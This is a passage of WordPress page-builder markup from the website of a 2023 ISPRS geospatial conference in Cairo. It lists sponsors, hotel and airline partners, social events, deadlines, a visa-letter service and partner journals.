height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" 